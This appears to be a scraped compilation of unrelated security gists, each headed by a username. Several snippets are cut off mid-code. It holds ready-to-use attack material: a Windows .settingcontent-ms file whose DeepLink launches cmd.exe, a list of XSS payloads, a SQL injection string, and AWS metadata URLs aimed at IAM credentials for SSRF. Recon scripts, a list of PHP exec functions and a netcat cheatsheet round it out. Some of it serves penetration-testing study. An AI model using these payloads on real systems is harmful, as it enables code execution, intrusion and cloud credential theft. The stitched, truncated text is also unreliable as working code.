ntrzz

curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt

mccabe615

Command Execution

exec           - Returns last line of commands output
passthru       - Passes commands output directly to the browser
system         - Passes commands output directly to the browser and returns last line
shell_exec     - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec - Executes a program

enigma0x3

<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>

ehsahil

#Tool based on a resolver.rb by @melvinsh
#Original Repository: https://github.com/melvinsh/subresolve
#Modified by @ehsahil for Personal Use.
require 'socket'
require 'colorize'

begin
  file = File.open(ARGV[0], "r")
rescue
  puts "Usage: ruby recon.rb wordlist"

phra

<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>

jhaddix

`
~/
~
ים
   
 
___
__
_

haccer

#!/bin/bash
# This script will fetch the Alexa top 1 million domains and prepare them how I like it.

# Check if unzip is installed
[ -f /usr/bin/unzip ] || sudo apt-get install unzip

# Get Alexa Top 1 mil
wget -q --show-progress http://s3.amazonaws.com/alexa-static/top-1m.csv.zip

# Unzip

tylernchls

HTTP Basics

Excerise #2

• Solution: Inpect Post request in dev tools and you will see magic number at bottom with the post data.

SQL Lesson

String injection

• Goal: Return all users from the user table in the db via string injection
• Enter Smith will give you single record
• Solution: Fart' OR '1'='1
• The above will return all users in the db even though their is no user named Fart. This is because every record will return with a true value hence the OR statement('1'='1 or true), therefore return the whole users table.

jhaddix

## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

rousan

Netcat cheatsheet

• Netcat listening on port 567/TCP:

$ nc -l 567

• Connecting to that port from another machine: